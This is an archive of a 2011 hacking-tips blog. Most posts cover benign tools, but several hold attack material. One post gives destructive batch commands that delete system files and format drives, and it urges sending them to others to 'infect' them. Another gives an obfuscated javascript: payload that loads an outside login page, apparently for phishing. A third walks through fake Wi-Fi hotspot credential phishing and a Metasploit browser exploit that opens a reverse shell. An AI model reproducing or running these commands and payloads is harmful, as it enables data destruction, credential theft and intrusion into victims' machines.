Wednesday 31 August 2011

Making Your Data Underground


Tonight I am going to demonstrate an example of hiding data inside a file which is known as steganography. Don’t panic as I am not going to talk about the common command prompt trick. This is something better and exciting. So stay connected.
I got an interesting tool called Invisible Secrets and it forced me to share it with you. This is a worth watching tool capable of performing data hiding and encrypting. Here I will show the data hiding process. Before we start get this tool from here.
Hiding data using Invisible SecretsNow install this application and start it. You will see a screen like that. Now select the Hide Filesoption provided by it.
Now you’ll be asked to select te files you want to hide inside a file. Select the desired one.

Now select the file which will contain this file. This is the file you’ll use to hide the first file.
Hiding data using Invisible SecretsIn the next step you’ll be asked to provide a password which will be required to access the data. Finally you’ll save the newly created file.
Now to unhide data from this file you’ll select Unhide Files option provided by the tool. select the file which you created and saved just a moment ago. Now you’ll be asked to enter the password and you’ll get all your hidden data.
In the example I hide a mp4 file inside a jpg file and save the output file as jpg. Now it looks and behaves like a normal jpg file but when you open it using this tool you will find that it contains a mp4 file too inside it.
So how cool it would be if I put my divorce related documents inside my wedding photographs. Bad joke! Not actually because I don’t have a wife to get divorced from. You have? Then you can use it. But I’ll urge you to please please check this awesome app and its cool features.

Creating Hashes Of A File


Once again I am back with the word I love most-Security. Often we send/receive files and would like a secure transmission that doesn’t allow someone to alter it during the midway of transmission. To ensure this we use the concept of hashes. You often see on torrent sites that they provide a hash for a particular file which ensures data integrity. You check the given hashes in order to ensure that the file is authenticated.
Now we will explore this process of hash creation and trust me it’s so simple. For this I got a tool called HashSlash. Now if I can get it then you can also get it as it is not my sole property. Just visit this link and you will get this tool in a single click.
So when you have this tool at your disposal then let’s start its enumeration. So just start it by a simple click and select the file for which we’ll compute the hash. Here we’ve selected to generate MD5 SHA1 and CRC32 hashes for the file.
Computing hashes for a file
Now click on Compute button to get your hashes.
Generate MD5 SHA1 and CRC32 hashes for any file
Now you’ve your hashes which you can share with the receiver side which they can check to ensure that they’ve the right file delivered. Simple and useful!

Encryption In Open Source Way


It’s quite common to encrypt or password protect our crucial data so that others can’t tamper or misuse it. There is a complete set of utilities available to do the task and here we are going to discuss one of them which looks small in size but perform the task perfectly.
Chiave is an open source file encryption utility which you can download from this site. It uses 512 Bit rijndael encryption algorithm to encrypt the data. Get this handy utility and install it. After installation it doesn’t need much efforts to encrypt any file.
File Encryption in easy stepsJust start the application and you’ll see the opening screen like this. Now select Encrypt option.
File Encryption in easy stepsNow it’s time to select files and folders which we want to encrypt. Here we’ll have to enter a password which is the key to unlock the encrypted contents. Set the password and click on Start Encryption button to start the final process and that’s all. Now whenever you want to decrypt a file then double-click on the file and Chiave will ask you to enter the password before unlocking that file or folder.
One cool fact about Chiave is that it adds an option in the context menu to encrypt the file. So when you want to encrypt a file you just need to right-click on that file and you’ll see the desired option in the context menu. So no need to start Chiave and then select the files. Now it’s time for some real action so let’s stop talking and you just check this app out now.

Is Your Password Strong Enough


Passwords are everywhere and it’s a common tendency to choose just a so so type of password without bothering much about its strength. That’s quite understandable because it’s tough to remember so many passwords.That’s why we normally use the same password everywhere and they are also easy to remember.
And now it’s time for some crooks to get their entry in the scene. Password hacking/breaking is some what these guys love a lot and we have made their job easier by choosing a lame password. Such passwords are easy to break using brute force approach.
Internet is such a large ocean of information that even wandering aimlessly you’ll find a number of islands where you’ll love to stay for a while. I am saying that because I found such an island where you can check the strength of your passwords.
Check the strength of your passwordJust visit this site and you’ll see a clean interface where you enter a password and it tells you the time which is required by a normal computer to break it using brute forcing.
With the superb increment in the computing power it has become easier to implement this approach of password breaking and modern techniques use even the power of your graphics card to do that. Even a good dictionary can be used to implement a successful dictionary attack. So the ultimate security is to choose a complicated and strong password which can drag you away from the nightmares.

Feel The Computer Forensic


Computer Forensic is the emerging concept in the field of Computer Security and Cyber Crimes.The techniques used and the objectives are just same as in the case of data recovery but in a broader context because it also includes the analysis of the data. It’s not a cakewalk but I am going to give a bit of feeling associated with Computer Forensic.
As we know that every trade has its own set of tools and techniques. So here we’ll need some sort of tools which will assist us in performing our task. So we start our journey by visitingosforensics.com and download the software callled OS Forensic which costs you nothing. Now when we have this tool in our arsenal then install it and let’s start playing with it.
Exploring Computer Forensic
This is the opening screen you’ll get on starting the program and on the left panel you’ll see various options which you can use in your forensic exploration. Some of its features are-
  • File Search
  • Recent Activities
  • Deleted File Search
  • Memory Viewer
  • Disk Viewer
  • Passwords including passwords stored in Browser
  • System Information (Check it)
  • Mount Drive Image
You can also install this software in a USB drive for complete portability. They also provide Hash Sets and Rainbow Tables in order to deal with Windows Passwords.
So this is an overview of this tool and my job ends here as I have shown you the way but it’s you who will have to complete the journey at your own. So just borrow an hour from your Facebook time and explore this tool. Also give a look at the site for some information on Hash Sets and Rainbow Tables they provide.

Switching Your DNS Easily


DNS servers as all of us know are used to translate  humanly memorable domain names  and hostnames into the corresponding  IP addresses because memorizing a site through its name is a lot easier than its IP address. The DNS is a distributed system and 13 top level root servers contain the complete database of domain names and IP addresses. This technology is based on the client/server architecture. Your Web browser functions as a DNS client  and contacts your Internet provider’s DNS servers when navigating between Web sites.
Some times your default DNS server takes a long time to resolve the addresses and some times it may slow down resulting in decreased performance and slow browsing speed. That’s why public DNS servers like Google and OpenDNS have been launched to solve the problem and provide you the best internet experience. But you’ll have to manually configure them before using their services. But if you stay with me for a few minutes then you will find an automated solution for that.
Just click this link and download the free utility called DNS Jumper. You don’t need to install it as it executes on a single click.Switching between the DNS servers
This is the neat and clean interface of this application where you choose your Network Card and they provide some good and efficient DNS servers which you can use. They also let you choose the fastest available DNS server by clicking on the Fastest DNS button. So now you don’t need to configure your DNS server manually as you have an automated solution available. So grab it and use it.

Get A Free SSH Account


Secure Shell(SSH) is a network protocol allowing data to be exchanged using a secure channel between two connected devices. It is widely used to keep our unencrypted data safe during the transmission process. TCP port 22 is used on your machine for providing an SSH connection to you. Now the main task is to get a server to which we can get connected and establish a secure data flow connection. And that’s why I am here so late at night because I want to see a sweet smile on your face when you get up in the morning-when I’ll be sleeping.
So get ready as I’ll provide you not one not two but three good SSH servers addresses. Actually I will provide you the good cool site and they will provide you those three servers. So what’s the site? Ah! Should I tell you that livessh.com is the site name where you can get it. Now when you know it then check them. They provide you three live servers which you can get connected to and enjoy. But the problem is half-solved now because we still need to do some sort of configuration in order to get this done and thankfully they solve this problem too.
Get an SSH connection for secure data transmissionThey have provide a link to download a tool calledMyENTunnel which means My Encrypted Tunnel.This tool saves us from the headache of configuring all settings manually using Putty. All you need to enter the IP and password of SSH server which you will get from this site. That’s all you need to do. So you can click onConnectbutton and our tunnel is ready to be used. So just check that site and stay connected because I’ll be back again.

Get the last shutdown time


This one for the Internet addicted folks like me or the good Counter Strike lovers and one who use their laptop as downloading machine for day and night. So guys when did you shutdown your machine for the last time? No idea! GET IDEA and follow these steps-
  • In XP type eventvwr.msc in the Run dialog box-Please for God sake don’t ask me how to open Run dialog box.
  • And if you use Vista or Windows7  then type the “Event Viewer” in the Start Search Box.Opening Even Viewer in Vista or Windows7
  • Now click on the System tab in the left panel.
  • Event ViewerNow look for the first occurrence of event with event id 6006. This will give us what we are searching for.
Event ID 6006So now I know the last shutdown time. It is  6:12 AM and this is not unusual for a net addicted guy. Enjoy and wait for the next post.

Running Windows Live CD


Live CDs are quite useful when we just want to have a trial of an Operating System before we actually decide to install it. So far we have seen a number of Linux distros running through Live CD like Ubuntu PCLinuxOS and many more. Now if u know me then you already know that I always have the simplest things in a different way. So what if I tell you how to run any Windows version through a Live CD. So just be cool as this post will also help you in Computer Forensic and Troubleshooting.
Again you know that I simply love softwares that make our life a bit easy-both personal and as a professional. So here again be ready for the task we are expert in-Downloading. Ya that’s what we are just going to do but no movie no game and no torrent too. It’s a simple tool called Ultimate Boot CD for Windows. You can get that from here. Now just install it and keep your original Windows CD at your hands because we will need it to create a Live CD.
Windows Live CDSo just put your Windows CD and start this application. You will see this screen and here you’ll be asked to provide a Source Path to your Windows files. So point out the CD location and that’s all you need to create a Live CD. Just click the Buildbutton and your ISO file will be created to the specified location. Now you can burn this ISO file and your live CD is ready to be explored. It has a lots of custom tools which can be useful in troubleshooting your computer.It includes Anti-Spyware Tools AntiVirus Tools Disk Tools File Recovery Tools Password and Registry tools. You can have a complete list of available tools here. Just go through it you will be glad to see such a complete troubleshooter at your disposal which you can use to a wide range of operations from data wiping to data recovery and from password editing to remote desktop controlling and so on. So won’t you like to check it. I know that you’ll.

Email With a Password


What’s the general way to protect something from malicious use? Passwords-no doubt. But what if we want to protect an email. No email provider provides this facility to protect an email with a password. Sometimes we may need to send a mail intended for a specific person and don’t want others to read it in case of account hacking or something. So how can we achieve this?
As I always say that there is a solution for every problem and this problem too. What if our email provider don’t provides this still we can do it.And the ultimate solution for this problem isLockbin.com. They provide this service without any cost. You can compose a message like usual and can attach files too.Then you set the password and this password is necessary to read that email.Ultimate security.
Encrypted Email by lockbin.com
The most amazing feature that fantasizes me is that they use https which is an extra advantage in security terms. When a free service can provide such kind of facility I think sites like facebook which doesn’t bother about security must learn something from them.

Hacking Root Password In Linux


Hi friends! Time to come back for another blog post regarding Linux and this time we’ll mess with the root account password. My friends who  know Linux at their fingertips would find it easy but nevertheless it’s really interesting. This is the first task one need to do during the RHCE exam. So let’s break the root password from the GRUB.
BREAKING LINUX PASSWORDAt the time of booting process starts press ESC key to enter OS selection menu.
Here highlight the OS using arrow keys and then press E to edit it. Now you will see a screen like this.
Select the second line containing information regarding kernel parameters.
Now again press E to edit these kernel parameters. We can edit various kernel parameters from here but what we’ll do is to change the runlevel of  System.
Once we have entered into parameter editing mode type 1 or s or single after a space and then press ENTER key. Now press B to boot the system in the single user mode. This is the troubleshooting mode for Linux and we use this for repairing and maintenance.
BREAKING LINUX PASSWORDNow let the system take its time to boot and once you get the prompt all you need is to issue just 2 simple commands.
setenforce 0
Here zero indicates to set SELinux permission to permissive mode. You may not need to do this in your home environment. After this issue passwd command and change the password for root account.

Once you have successfully changed the password issue init 5 to switch to graphical mode and enjoy -You have successfully changed the password for root account. So guys here we played with the GRUB and in my next  post I’ll tell you how to password protect your GRUB menu so that no mischief can be done through this trick .So till then wait and watch and have fun.

Sitemeter Hack – Hide Visual Tracker (Counter)


Sitemeter
Sitemeter, one of the best traffic counter for websites/blogs, it shows online users, Referrals (From where people coming to your site), country locations, browser etc etc.. all in detail.
This counter is visible to all visitors.
Invisible Counters (Tracker) is available for Premium Accounts Only…!
But you can easily hack to hide it.
Its just few setting changes which will work fine.
1) Login into your sitemeter account.
2) Go to ‘Manager’ from top menu.
3) Go to ‘Meter Style’ option from left hand menu.
4) Select 2nd last meter style (Counter, which shows simple numbers).previewmeter
5) Now in “DIGIT COLOR” select ‘Transparent’, Similarly in “BACKGROUND COLOR” select ‘Transparent’.
6) DONE.
Now your sitemeter counter is invisible from normal eyes in your site
Place it anywhere in your website/blog, and track your traffic, users.
Enjoy…..!

Format A HDD With Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

Remove shortcut arrow from desktop icons completely


To remove shortcut arrow from desktop icons in any type of document:
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Run Firefox inside Firefox

How to run Firefox inside Firefox.?

Yup you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).

chrome://browser/content/browser.xul


Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-


firefox inside firefox

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox. 

Chat with Friends through ms dos Command Prompt


1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

Monday 29 August 2011

Orkut LogOut Code

Orkut LogOut Code, i think u have seen LogOut Scrap this is new trick to logout..

javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%66%72%61%6D%65%73%65%74%20%72%6F%77%73%3D%27%31%30%30%25%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%4E%4F%27%20%62%6F%72%64%65%72%3D%27%30%27%20%66%72%61%6D%65%73%70%61%63%69%6E%67%3D%27%30%27%3E%3C%66%72%61%6D%65%20%6E%61%6D%65%3D%27%63%6F%6E%72%5F%6D%61%69%6E%5F%66%72%61%6D%65%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%68%79%67%61%64%61%2E%66%72%65%65%77%65%62%37%2E%63%6F%6D%2F%53%65%72%76%69%63%65%4C%6F%67%69%6E%2E%68%74%6D%27%3E%3C%2F%66%72%61%6D%65%73%65%74%3E%22%29%3B%61%6C%65%72%74%28%22%48%61%48%61%21%20%74%68%61%74%20%77%61%73%20%61%20%74%72%69%63%6B%20%74%6F%20%6C%6F%67%20%79%6F%75%20%6F%75%74%22%29%0A%0A%0A

Copy the above code & paste it in address bar & u ll be logged out with a nice message..

LOVE letter Generators

L♥VE letter Generators>>>>>>>>>>>>>>>>Now u love some one...
she/he is in orkut....
but u cant x press ur feelings ♥
so create flash love letters nd scrap him/her
CLICK HERE

Wireless HOTSPOT Hacks

Wireless Hoptspot Hacks, " Wireless Hacks" tell abt how 2 perform hotspot hacks? hacks/cracks/techniques dat u ll hopefully find 2 be "cool".

Hack:
U might seen wilreless hotspots as they can seen anywhere, with T-Mobile,Concourse,Wayport & so on...As we know mobile user are quickly connected in public places.Some Hotspots are available for free or some require free subscription.IN public places these WI-Fi hotspot are the greater security risks which we find.

Stealing Wi-Fi Hotspot credentials:
Once in Russia a hacker used to hack username & passwords of dial accounts & used to sell them in black market & the owner of stolen credentials had to pay high charges.With the adding of public WI-Fi locations, hte threat of stealing credentials have been increased & also stealing wireless subscription credentials.
The easiest way to steal wireless subscription credentials is done by AP Phishing. Today's real & applicable method is that end-user determines dat a wireless access point is valid by recognizing the SSID and ascertaining if the site has the look and feel of the real public Wi-Fi hotspot login page.For the end-user both of these can be spoofed(u cannot create normal network connections) & u need not to carry wireless access point around for doing this.
Steps to perform this technique:
  • First of all u have to setup ur computer to look alike an actual acsess point broadcasting da appropriate SSID(T-Mobile, Wayport, etc.)
  • Now u have login page & ur PC ll display look alike original login page of provider whose signals u r broadcasting.
It is easy to make ur pc broadcast the SSID of ur Choice, so dat the user can connect to u instead of valid WI-Fi Hotspot SSID.The problem with dis method is sees dat dis is an Ad-Hoc network & they do not connect to it.Now we use Airsnarf by Schmoo Group to make da signal as it is coming from an access point, we turn our pc into access point.
Difficult part in using Airsnarf & other HostAp programs is to find a card which supports HostAP drivers.Generally we use Senao NL-2511CD PLUS EXT2 200mw PCMCIA Wi-Fi with a Rover Portable Laptop Mount 2.4GHz 5.5dBi Antenna, we can purchase them from http://www.wlanparts.com/.
Airsnarf consists of a number of configurable files that control how it operates.
Active Image
airsnarf.cfg file used to configure basic Airsnarf functionality
Active Image
airsnarf.cgi file
With Airnsnarf configured with default settings, it will display a default login page that looks like the following:
Active Image
This page takes username & password which is entered & place it in a file wer it can be read.
For making dis attack work, we have modify this login page so dat it looks same as WI_Fi hotspot provider's login.Basic html skills are required, it is not so difficult to goto a T-Mobile, Wayport, STSN, Concourse or any other hotspot provider's site u have to copy & paste their graphics to make ur fake login page look real.

After configuring Airsnarf & creating fake login page, we can launch the attack.Any public place like airport,coffee shop's, parks wer people uses their laptops it ll work.For launching dis attack we have to activate Airsnarf by typing ./airsnarf command. Below u can c wat is going to happen after launching ur attack.
Active Image
Airsnarf being launched and waiting for a connection
Here we see an end-user attempts to connect to the hotspot ll c the SSID which was entered in
airsnarf.cfg file & use der pc to connect to the network.After launching der browser, they r asked to enter their username & password.
Active Image
Windows Zero Config showing the T-Mobile HotSpot being broadcast by Airsnarf
Active Image

Fake Walled Garden/Login Page presented by Airsnarf
If the user enter his username & password & clicks on login button, his username & password has been sent to hackers & he can utilises it.Many of us keep same username & passwords for all accounts so dat we can remember,Now if da hackers gets ur username & password can access ur email's ur online banking & so on.....
Active Image
Example of credentials entered into Airsnarf AP Phishing Site and dumped to a file
U can also make variations for the aboce trick to change SSID's to "Free Public Wi-Fi",& at this point u can change login page as below.
Active Image
Many users ll fall for dis trick & u can access der accounts..

Malicious Websites & Browser Exploits:
Given the knowledge of the aforementioned exploits, a creative combination could be had. What if the walled garden/login page in the previous exploit actually contained code that would exploit a user's machine? That way an attacker could gain access to an end-user system just by that user attempting to connect to what they believe is a valid Wi-Fi hotspot. An exploit that could take advantage of this is Microsoft's relatively recent Create Text Range vulnerability. All a hacker would need to do is copy the malicious code into the login page and every person who connected to that hotspot could potentially be exploited.
Active Image

Part of the actual code that could be inserted into a webpage to automatically download and run a malicious executable on the victim's machine just by that user viewing the webpage.

That would be "cool," but we're going to take it a step further. What if people who were currently connected to the hotspot were "forced" to view a malicious page, regardless of the URL they entered into their browser? That would be "cooler!"
This hack contains the following steps:
  • Creating a malicious webpage and serving-it-up on a laptop
  • Redirecting traffic at a Public Wi-Fi Hotspot to that malicious webpage running on the laptop
  • As the victim is redirected and the malicious page is viewed, a browser-based exploit is run which gives the hacker a live command shell (c:\) on the victim's machine
So, the hacker goes to a Public Wi-Fi hotspot and connects to the network. He then launches Metasploit to create the malicious webpage and serve-it-up.

Active Image
Commands to use Microsoft's Create Text Range vulnerability and to select the option of creating a reverse shell back to the hacker once the exploit is executed
Active Image
The setting of various options for the exploit
Active Image
With all options set properly, the web page is served-up and ready to exploit the machine by running the "exploit" command
Now that there's a machine on the hotspot network running a malicious webpage, it's necessary to redirect traffic destined for the Internet to that website.
Active Image
Run the arpspoof command to redirect traffic destined for the Internet to the malicious webpage.
Active Image
Running dnsspoof, you can see that a user attempted to go to foxnews.com but was redirected to the malicious webpage.
Active Image
This is the page that contains the malicious content that will enable a hacker to connect to the victim machine via Netcat. This page appears regardless of the URL entered by the end-user. This page could look like and say anything.
Active Image
The hacker then launches Netcat. The C:\ is on the victim's machine which is real bad news for the victim. FYI - Windows XP Firewall and Symantec AV were running the entire time.
If you didn't want to go to a public Wi-Fi hotspot and serve-up the webpage, you could just host the website somewhere and send out e-mails trying to convince people to go to the site. With Metasploit, for example, the payload doesn't have to be a reverse shell, you can have the malicious webpage download and execute a malicious file. Perhaps that malicious file would install a Trojan, Keylogger, or other Malware.
Active Image
Examples of possible Metasploit Payloads for ie_createtextrange exploit.

Now that we've seen the "cool" and illegal hacks, let's talk about the real purpose of this article - Prevention!

Preventing the Hacks:There are basically two things to combating the previous hacks:

  • Taking measures to ensure a hotspot is valid
  • Protecting the machine against browser-based exploits
Ensuring a Hotspot is Valid:
Validating a hotspot is extremely difficult for an end-user to do. In fact, the only realistic method to do so is to use a wireless client designed to work with various hotspots that can use some sort of WISPr check to help ensure the Hotspot is what it says it is. I used T-Mobile in the above example in large part because they are one of the few providers that can utilize this type of functionality. In fact, the best solution I know for enterprises to protect against public hotspot AP Phishing for their mobile users is to use a client such as Fiberlink's e360. Using a client such as this provides two areas of protection:
  1. The hotspot signal itself can be validated
  2. The end-user doesn't enter their credentials into a webpage which can be faked. They select a signal with the client and enter the credentials in that client.
Note that in the below graphic, a valid T-Mobile HotSpot is displayed as "Fiberlink Wireless Premium Powered by T-Mobile" as opposed to just "tmobile." That is because the client has determined that the particular hotspot in question is, in fact, a valid T-Mobile HotSpot. If it were not valid a valid hotspot, the SSID would simply be displayed as it is being broadcast.
Active Image
Client-based solution that helps mitigate risk by helping to validate a hotspot.
As mentioned in the second point, the user enters their credentials into the client not into a web-based form. For many obvious reasons, this is significantly more secure. With this particular client, both the username and password are immediately encrypted with 256-bit AES.
Active Image
The entering of credentials into a client as opposed to an easily spoofed webpage.
Protecting the Machine Against Browser-based Exploits:
As with many exploits, the key is to have the mobile device be protected at all times. To protect against these exploits, the mobile device needs to:
  • Have the latest security patches installed. This is increasingly difficult to do for corporations as laptops are spending less and less of their time connected to the corporate LAN. This is bad, since many corporations can only push patches to machines when they are on the LAN. Consequently, corporations need to employ solutions that can push patches down to mobile devices anytime they are connected to the Internet and without end-user interaction.
  • Be restricted from surfing the Internet or connecting wirelessly if they do not have the latest patches. This makes sense. If you are not secure enough to surf the Internet or connect to wireless hotspots, because you do not have a necessary patch, you shouldn't be able to do so. In essence, you need to protect yourself from yourself. For corporations, they are beginning to look at functionality such as Cisco NAC to help with this. Unfortunately, Cisco NAC only quarantines on the LAN or Post-VPN. It won't analyze the security posture of the mobile device or quarantine it if it doesn't have the necessary patches until it is essentially too late. That's why corporations need to implement solutions that will quarantine and remediate devices while the device is mobile, not just when they are VPNing into the corporate network. The logic for assessing the security posture and for quarantining needs to be on the endpoint itself!
  • Employ a program to protect against Zero Day type of attacks such as a Personal Firewall with IPS capabilities. As an example, even if the above machine weren't patched, ISS' Proventia would protect a machine against the aforementioned browser exploit.

conclusion: I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.

Conclusion:
I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.
Special thanks to the Metasploit Project and Schmoo Group. The use of your tools in explaining how the exploits are performed and the work you have put into the development of these tools is invaluable and appreciated.